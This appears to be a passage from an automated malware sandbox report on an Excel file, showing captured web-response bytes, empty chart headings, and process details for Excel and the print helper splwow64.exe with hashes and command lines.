                2024-12-20 15:11:55 UTC1025INData Raw: 22 3a 5b 5d 2c 22 65 6d 61 69 6c 22 3a 6e 75 6c 6c 2c 22 61 70 69 6b 65 79 22 3a 6e 75 6c 6c 2c 22 66 65 74 63 68 65 64 22 3a 66 61 6c 73 65 7d 7d 7d 2c 22 70 61 67 65 22 3a 22 2f 5f 65 72 72 6f 72 22 2c 22 71 75 65 72 79 22 3a 7b 7d 2c 22 62 75 69 6c 64 49 64 22 3a 22 75 6d 32 32 67 32 4c 50 38 4b 6f 30 6a 6b 31 76 48 72 50 43 63 22 2c 22 69 73 46 61 6c 6c 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 63 75 73 74 6f 6d 53 65 72 76 65 72 22 3a 74 72 75 65 2c 22 67 69 70 22 3a 74 72 75 65 2c 22 61 70 70 47 69 70 22 3a 74 72 75 65 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6d 6f 64 75 6c 65 3d 22 22 20 73 72 63 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 72 75 6e 74 69 6d 65 2f 70 6f 6c 79 66 69 6c 6c 73 2d 35 32 61 35 66 39 32 30 32 36 65 66
                Data Ascii: ":[],"email":null,"apikey":null,"fetched":false}}},"page":"/_error","query":{},"buildId":"um22g2LP8Ko0jk1vHrPCc","isFallback":false,"customServer":true,"gip":true,"appGip":true}</script><script nomodule="" src="/_next/static/runtime/polyfills-52a5f92026ef


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:10:10:50
                Start date:20/12/2024
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                Imagebase:0xf0000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:7
                Start time:10:11:55
                Start date:20/12/2024
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0x7ff715380000
                File size:163'840 bytes
                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:9
                Start time:10:12:19
                Start date:20/12/2024
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
                Imagebase:0xf0000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Disassembly

                No disassembly